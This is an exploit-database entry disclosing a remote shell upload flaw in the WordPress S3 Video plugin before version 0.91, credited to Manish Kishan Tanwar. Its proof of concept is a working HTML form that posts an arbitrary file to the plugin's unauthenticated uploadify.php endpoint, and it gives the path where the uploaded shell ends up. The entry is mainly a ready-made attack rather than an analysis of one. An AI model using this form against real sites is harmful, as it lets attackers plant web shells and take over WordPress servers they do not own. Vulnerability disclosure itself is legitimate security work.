WordPress S3 Video Remote Shell Upload Vulnerability

2015-12-11T00:00:00
ID 1337DAY-ID-24707
Type zdt
Reporter Manish Tanwar
Modified 2015-12-11T00:00:00

Description

WordPress S3 Video plugin suffers from a remote shell upload vulnerability. Versions prior to 0.91 are affected.

                                        
                                            ##################################################################################################
#Exploit Title : Wordpress S3 Video Plugin file upload 
#Author        : Manish Kishan Tanwar AKA error1046
#Vendor Link   : http://plugins.svn.wordpress.org/s3-video/tags/0.91/      
# Affected Version: below version 0.91
#Date          : 9/12/2015
#Love to       : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi
#Discovered At : Indishell Lab
##################################################################################################

////////////////////////
/// Overview:
////////////////////////
The S3 Video Plugin allows the embedding of video media stored on Amazon's S3 storage into a WordPress blog post or page.
 
////////////////
///  POC   ////
///////////////


http://www.taget.com/wp-content/plugins/s3-video/includes/uploadify.php

<form method=post action="http://www.taget.com/wp-content/plugins/s3-video/includes/uploadify.php" enctype="multipart/form-data">
<input type=file name=Filedata> <input type=submit name=submit>

shell location:-
target.com/shell.php

#  0day.today [2018-04-09]  #